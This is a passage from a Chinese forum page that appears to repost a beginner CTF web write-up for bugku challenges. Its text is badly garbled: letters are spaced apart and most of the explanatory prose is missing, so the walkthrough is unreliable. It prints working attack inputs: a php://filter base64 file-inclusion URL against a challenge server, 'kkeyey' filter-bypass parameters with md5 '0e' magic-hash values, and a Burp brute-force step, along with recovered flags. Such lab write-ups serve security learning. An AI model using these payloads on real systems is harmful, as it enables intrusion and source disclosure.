搜索

[20975] 2020-04-22_【CTFweb入门第五篇】bugku的web入门题

文档创建者:s7ckTeam
浏览次数:31
最后更新:2025-01-18
2020-04-22_【CTFweb入门第五篇】bugku的web入门题 C T F   w e b b u g k u w e b L e m o n S e c   2 0 2 0 - 0 4 - 2 2 b u g k u - c t f   w e b 4     访 便   1 1 1   S u b m i t     u n e s c a p e
f u n c t i o n   c h e c k S u b m i t ( ) { v a r a = d o c u m e n t . g e t E l e m e n t B y I d ( " p a s s w o r d " ) ; i f ( " u n d e f i n e d " ! = t y p e o f a ) { i f ( " 6 7 d 7 0 9 b 2 b   a a 6 4 8 c f 6 e 8 7 a 7 1 1 4 f 1 " = = a . v a l u e ) r e t u r n ! 0 ; a l e r t ( " E r r o r " ) ; a . f o c u s ( ) ; r e t u r n ! 1 } } d o c u m e n t . g e t E l e m e n t B y I d ( " l e v e l Q u e s t " ) . o n s u b m i t = c h e c k S u b m i t ;   西 e v a l ( u n e s c a p e ( p 1 )   + u n e s c a p e ( ' % 3 5 % 3 4 % 6 1 % 6 1 % 3 2 '   +   p 2 ) ) ; p 1 + % 3 5 % 3 4 % 6 1 % 6 1 % 3 2 + p 2 f l a g   6 7 d 7 0 9 b 2 b   5 4 a a 2     a a 6 4 8 c f 6 e 8 7 a 7 1 1 4 f 1 f l a g 6 7 d 7 0 9 b 2 b 5 4 a a 2 a a 6 4 8 c f 6 e 8 7 a 7 1 1 4 f 1 K E Y { J 2 2 J K - H S 1 1 }   b u g k u - c t f   f l a g i n d e x 访 u r l   h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 5 / p o s t / i n d e x . p h p ? f i l e = s h o w . p h p   f i l e C T F   p h p h t t p : / / p h p . n e t / m a n u a l / z h / w r a p p e r s . p h p . p h p     h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 5 / p o s t / i n d e x . p h p ? f i l e = p h p : / / f i l t e r / r e a d = c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = i n d e x . p h p
b a s e 6 4 i n d e x < h t m l >       < t i t l e > B u g k u - c t f < / t i t l e > < ? p h p                   e r r o r _ r e p o r t i n g ( 0 ) ;                   i f ( ! $ _ G E T [ f i l e ] ) { e c h o ' < a   h r e f = " . / i n d e x . p h p ? f i l e = s h o w . p h p " > c l i c k   m e ?   n o < / a > ' ; }                   $ f i l e = $ _ G E T [ ' f i l e ' ] ;                   i f ( s t r s t r ( $ f i l e , " . . / " ) | | s t r i s t r ( $ f i l e , " t p " ) | | s t r i s t r ( $ f i l e , " i n p u t " ) | | s t r i s t r ( $ f i l e , " d a t a " ) ) {                                       e c h o   " O h n o ! " ;                                       e x i t ( ) ;                   }                   i n c l u d e ( $ f i l e ) ; / / f l a g : f l a g { e d u l c n i _ e l i f _ l a c o l _ s i _ s i h t } ? > < / h t m l > f l a g f l a g { e d u l c n i _ e l i f _ l a c o l _ s i _ s i h t } f i l e = p h p : / / f i l t e r / r e a d = c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = i n d e x . p h p   f i l e g e t p h p : / / p h p : / / f i l t e r / 访 / r e a d = c o n v e r t . b a s e 6 4 - e n c o d e / b a s e 6 4 r e s o u r c e = i n d e x . p h p i n d e x . p h p   i n d e x . p h p i n c l u d e p h p   i n c l u d e f i l e i n c l u d e i n d e x . p h p b a s e 6 4 b a s e 6 4 b a s e 6 4   b a s e 6 4 f l a g         . . /   t p   d a t a   i n p u t   p h p : / / b u g k u - c t f   f l a g h t t p : / / 1 2 3 . 2 0 6 . 8 7 . 2 4 0 : 8 0 0 2 / b a o p o /
5 b u r p   p a o b o   b u r p s u i t e 1 3 5 7 9 f l a g f l a g { b u g k u - b a o p o - h a h }   b u g k u - c t f   g o a l j s
c l i c k g e t p o s t c l i c k f l a g { N o t _ C 0 0 k l 3 C l 1 c k 3 r } b u g k u - c t f  
            . b a k     y i h a n g w a n g / S o u r c e L e a k H a c k e r i n d e x . p h p . b a k 访 b a k   1 1     s t r s t r   U R I ' ? ' ( ' ? ' )                   s t r i s t r   s t r s t r 1 2     s u b s t r   ' ? ' 1 3     s t r _ r e p l a c e   ' k e y ' 使 k k e y e y   1 4     p a r s e _ s t r    
e n d   k e y 1 , k e y 2 m d 5 p h p         p h p             h t t p s : / / w w w . c n b l o g s . c o m / M r s m 1 t h / p / 6 7 4 5 5 3 2 . h t m l h t t p s : / / c l o u d . t e n c e n t . c o m / d e v e l o p e r / a r t i c l e / 1 0 4 6 7 0 1 p h p # p h p 8 b o o l e a n i n t e g e r f l o a t s t r i n g a r r a y o b j e c t r e s o u r c e n u l l   p h p = =             p h p # p h p P H P P H P 0   ( - _ - )   $ k e y 1   = =   $ k e y 2 # m d 5 m d 5   O ( _ ) O   m d 5 0 e 0 e 0 e 0 0 m d 5 ( ' 2 4 0 6 1 0 7 0 8 ' )   = =   m d 5 ( ' Q N K C D Z O ' ) !   Q N K C D Z O 0 e 8 3 0 4 0 0 4 5 1 9 9 3 4 9 4 0 5 8 0 2 4 2 1 9 9 0 3 3 9 1   s 8 7 8 9 2 6 1 9 9 a 0 e 5 4 5 9 9 3 2 7 4 5 1 7 7 0 9 0 3 4 3 2 8 8 5 5 8 4 1 0 2 0   s 1 5 5 9 6 4 6 7 1 a 0 e 3 4 2 7 6 8 4 1 6 8 2 2 4 5 1 5 2 4 9 7 4 1 1 7 2 5 4 4 6 9   s 2 1 4 5 8 7 3 8 7 a 0 e 8 4 8 2 4 0 4 4 8 8 3 0 5 3 7 9 2 4 4 6 5 8 6 5 6 1 1 9 0 4   s 2 1 4 5 8 7 3 8 7 a 0 e 8 4 8 2 4 0 4 4 8 8 3 0 5 3 7 9 2 4 4 6 5 8 6 5 6 1 1 9 0 4   s 8 7 8 9 2 6 1 9 9 a 0 e 5 4 5 9 9 3 2 7 4 5 1 7 7 0 9 0 3 4 3 2 8 8 5 5 8 4 1 0 2 0   s 1 0 9 1 2 2 1 2 0 0 a 0 e 9 4 0 6 2 4 2 1 7 8 5 6 5 6 1 5 5 7 8 1 6 3 2 7 3 8 4 6 7 5   s 1 8 8 5 2 0 7 1 5 4 a 0 e 5 0 9 3 6 7 2 1 3 4 1 8 2 0 6 7 0 0 8 4 2 0 0 8 7 6 3 5 1 4   p a y l o a d ? k k e y e y 1 = Q N K C D Z O & k k e y e y 2 = 2 4 0 6 1 0 7 0 8   B u g k u { O H _ Y O U _ F I N D _ M Y _ M O M Y }    

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理